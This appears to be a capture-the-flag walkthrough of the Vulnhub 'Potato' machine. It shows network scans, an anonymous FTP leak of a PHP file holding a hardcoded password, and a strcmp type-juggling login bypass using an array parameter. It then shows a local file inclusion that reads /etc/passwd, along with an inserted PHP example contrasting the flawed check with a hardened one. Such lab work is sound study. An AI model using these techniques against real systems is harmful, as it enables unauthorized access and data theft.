Potato
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.85.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.114 08:00:27:77:c6:7c 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:b5:6e:e2 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.114.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.114 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 01:55 EST
Nmap scan report for bogon (192.168.56.114)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
| 256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_ 256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
|_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
MAC Address: 08:00:27:77:C6:7C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
The target host has three open ports: 22 (SSH), 80 (HTTP) and 2112 (FTP).
Get Access
Information gathering starts with the FTP service.
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ftp 192.168.56.114 -P 2112
Connected to 192.168.56.114.
220 ProFTPD Server (Debian) [::ffff:192.168.56.114]
Name (192.168.56.114:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user [email protected] !
230-
230-The local time is: Fri Nov 11 14:57:04 2022
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47701|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4.0k Aug 2 2020 .
drwxr-xr-x 2 ftp ftp 4.0k Aug 2 2020 ..
-rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
226 Transfer complete
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||5403|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
901 29.58 KiB/s
226 Transfer complete
901 bytes received in 00:00 (14.61 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||1134|)
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
54 941.68 KiB/s
226 Transfer complete
54 bytes received in 00:00 (46.29 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ls
index.php.bak nmap_full_scan welcome.msg
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat index.php.bak
<html>
<head></head>
<body>
<?php
$pass= "potato"; //note Change this password regularly
if($_GET['login']==="1"){
if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
setcookie('pass', $pass, time() + 365*24*3600);
}else{
echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
}
exit();
}
?>
<form action="index.php?login=1" method="POST">
<h1>Login</h1>
<label><b>User:</b></label>
<input type="text" name="username" required>
</br>
<label><b>Password:</b></label>
<input type="password" name="password" required>
</br>
<input type="submit" id='submit' value='Login' >
</form>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
The target host allows anonymous FTP access. After downloading the files locally, a username and password turn up right away, a pleasant surprise:
admin
potato
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ gobuster dir -u http://192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/11 01:59:23 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 316] [--> http://192.168.56.114/admin/]
/potato (Status: 301) [Size: 317] [--> http://192.168.56.114/potato/]
/server-status (Status: 403) [Size: 279]
Progress: 219152 / 220561 (99.36%)===============================================================
2022/11/11 02:00:08 Finished
===============================================================
The /admin directory is discovered; try logging in to that page with the username and password found above.
But the login does not succeed, which is strange: after many attempts it keeps reporting a wrong password. This is actually a trap.
In PHP, the loose equality operator (==) compares only the final values of its two operands, not their data types. The strict equality operator (===) first checks whether the types on both sides match, then checks whether the values match, and returns true only if both agree.
A bypass found online ultimately relies on the fact that in PHP, NULL == 0 is true.
Put simply, the password parameter is expected to be a string, but an empty array is submitted instead. strcmp() then returns NULL, and under PHP's loose comparison (==) NULL equals 0, so the condition is satisfied and the login succeeds.
Login successful.
Under the Logs section, analysing the requests with Burp shows that when a file is selected, the submitted POST body contains a file parameter; check whether a local file inclusion (LFI) vulnerability exists.
An LFI vulnerability is present: the /etc/passwd file can be read.
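The following added example (not part of the original index.php.bak or this writeup) places the recovered loose strcmp() check beside a hardened version of the same check and runs both against constructed request bodies, including the array-typed password. The behaviour differs by PHP version: on PHP 7 strcmp() on an array returns NULL with a warning, on PHP 8 it throws a TypeError, so the example catches that case.

```php
<?php
// Vulnerable: mirrors the logic of the recovered index.php.bak. With a loose
// comparison, strcmp() returning NULL (PHP 7, array argument) satisfies "== 0".
function loose_check($username, $password, string $expected): bool
{
    return strcmp($username, "admin") == 0 && strcmp($password, $expected) == 0;
}

// Hardened: reject non-string input before comparing, use strict identity for
// the username, and hash_equals() for the secret so no type juggling applies.
function strict_check($username, $password, string $expected): bool
{
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    return $username === "admin" && hash_equals($expected, $password);
}

$expected = "potato"; // value from the recovered index.php.bak

// Constructed request bodies: a valid login, a wrong password, and the
// "password[]=" form submission that arrives as an empty array.
$requests = [
    'correct password' => ['username' => 'admin', 'password' => 'potato'],
    'wrong password'   => ['username' => 'admin', 'password' => 'wrong'],
    'password[]='      => ['username' => 'admin', 'password' => []],
];

foreach ($requests as $label => $req) {
    try {
        // @ silences the PHP 7 warning; PHP 8 throws TypeError instead.
        $loose = @loose_check($req['username'], $req['password'], $expected);
    } catch (TypeError $e) {
        $loose = false; // PHP 8 refuses the array outright
    }
    $strict = strict_check($req['username'], $req['password'], $expected);
    printf("%-17s loose=%s strict=%s\n", $label,
        $loose ? 'accepted' : 'rejected', $strict ? 'accepted' : 'rejected');
}
```

On PHP 7 the third row shows loose=accepted and strict=rejected, which is exactly the gap the bypass above relies on; on PHP 8 both columns reject it.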
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12